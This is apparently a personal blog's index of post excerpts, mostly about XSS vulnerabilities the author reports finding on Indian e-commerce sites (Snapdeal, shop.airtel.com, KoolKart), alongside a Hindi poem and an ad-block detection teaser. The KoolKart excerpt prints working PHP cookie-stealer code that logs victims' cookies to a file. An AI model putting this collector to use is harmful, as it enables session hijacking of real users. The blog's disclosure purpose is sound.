आज फिर से एक सपना देखा, कि फिर सब पहले जैसा है। वही तुम हो, वही मैं हूँ, और आखों में वही ख्वाब हैं। आज भी वही काली शर्ट पहनी…

Read More वही तुम, वही मैं (Hindi Poetry)


Update: Got a mail from snapdeal security team, and this vulnerability has been fixed.
I just found a XSS vulnerability on a very popular Indian e-commerce site snapdeal.com. It was a bit tricky to find the XSS pattern, because searching for a string containing some  javascript functions such as “alert(” or “String.fromCharCode(“, were throwing “Access Denied” page. Though, the search string containing “eval(” wasn’t throwing any error.

Snapdeal XSS Access-Denied

Read More Hey Snapdeal – You’ve got a XSS vulnerability [Fixed]

technology xss

I was randomly browsing through shop.airtel.com and discovered a XSS vulnerability. This involves one of the simplest forms of XSS attack, known as end title tag attack. This vulnerability is present in such…

Read More XSS vulnerability found on shop.airtel.com

technology xss

Affiliate Web Hosting

Lately, I’ve seen a lot of people using ad block extensions/addons to block ads on the websites. Such extensions/addons reduce the clutter a bit, hence provide a better browsing experience to the user. But on the other hand, many sites solely depend on the ad revenues in order to keep them running.

In order to fix this problem, I quickly hacked a very tiny script which detects ad blocking extensions/addons. I’ve tested the script with AdBlock and AdBlock Plus extensions and it worked fine.

Here are the steps to detect ad blocking extensions/addons: Read More Simple way to detect ad blocking extensions/addons (and monetizing without ads)


I was going though few Indian e-commerce websites and found XSS vulnerabilities in few of them. I’m not publishing injection patterns due to security reasons. If anyone from the companies listed below want to know the injection pattern for their respective websites, get in touch. Below is the list of websites which are vulnerable:

Find the screenshots for all the sites listed above (click to enlarge) : Read More Popular (and not so popular) Indian E-commerce websites with XSS vulnerabilities


Earlier, I demonstrated the XSS vulnerability in DealsAndYou (fixed) and now, I’ll demo a XSS bug on KoolKart.com. I’ll describe the whole process below.

Step 1 – Writing a php script for saving cookie returned by injected code (cookie-stealer.php).

$str = trim($_REQUEST['cookie']);
$file = 'cookie.txt';
    $current = file_get_contents($file);
    $current .= date('Y-m-d H:i:s') . "\t\t" . $str . "\n\n\n";
    file_put_contents($file, $current);
    header('Location: http://www.koolkart.com/');

The code is self explanatory. It gets the cookie information via querystring, saves it to a text file and redirects back to koolkart. Read More KoolKart.com, get Kooler by sanitizing your input